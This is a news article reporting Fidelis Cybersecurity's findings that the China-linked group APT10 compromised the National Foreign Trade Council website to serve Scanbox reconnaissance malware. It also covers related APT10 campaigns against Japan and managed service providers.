A threat actor linked to China hijacked the website of a prominent U.S. trade association in an effort to deliver reconnaissance malware to individuals who accessed certain web pages.
Fidelis Cybersecurity published a report detailing the campaign on Thursday, just hours before a meeting between U.S. President Donald Trump and his Chinese counterpart, Xi Jinping.
The company noticed in late February that the website of the National Foreign Trade Council (NFTC) had been hacked and set up to serve malware in what is known as a watering hole attack, or a strategic web compromise. Experts believe the attack ended by March 2, when links injected into the NFTC website had been removed.
Evidence uncovered by investigators led them to believe that the attack was conducted by a China-linked cyber espionage group known as APT10, MenuPass and Stone Panda. Fidelis has dubbed the campaign Operation TradeSecret.
According to researchers, the hackers set up certain web pages of the NFTC website to serve a reconnaissance framework known as Scanbox. The tool has been used for several years, including in attacks aimed at U.S. organizations and the Uyghur population in China.
Scanbox has various plugins that allow attackers to collect information about the infected system and the software installed on it, and log keystrokes from the web browser. The harvested data can then be used to launch further attacks against the targeted individuals.
In the case of the NFTC, whose board of directors includes some of the largest private sector companies in the United States, APT10 targeted only specific web pages. One of them was a registration page for a board of directors meeting, which suggests that people or organizations expected to attend the meeting had been targeted.
“All organizations that have representatives on the board of directors of the NFTC — or those who would have a reason to visit the site — should investigate potentially impacted hosts using indicators provided in this report,” warned Fidelis. “Since the reconnaissance tool is typically used to enable future targeting campaigns, it should be assumed that targeted individuals will be subject to further attacks — such as spearphishing campaigns.”
The security firm said it notified the lobbying group of the breach. SecurityWeek has reached out to NFTC for comment and will update this article if the organization responds.
Fidelis also reported seeing a similar campaign involving a fake website of Japan’s Ministry of Foreign Affairs. The APT10 attacks targeting Japan were also detailed in a report published this week by PwC UK and BAE Systems.
The research conducted by the two companies focused on attacks launched by APT10 against managed service providers (MSPs) in at least fourteen countries.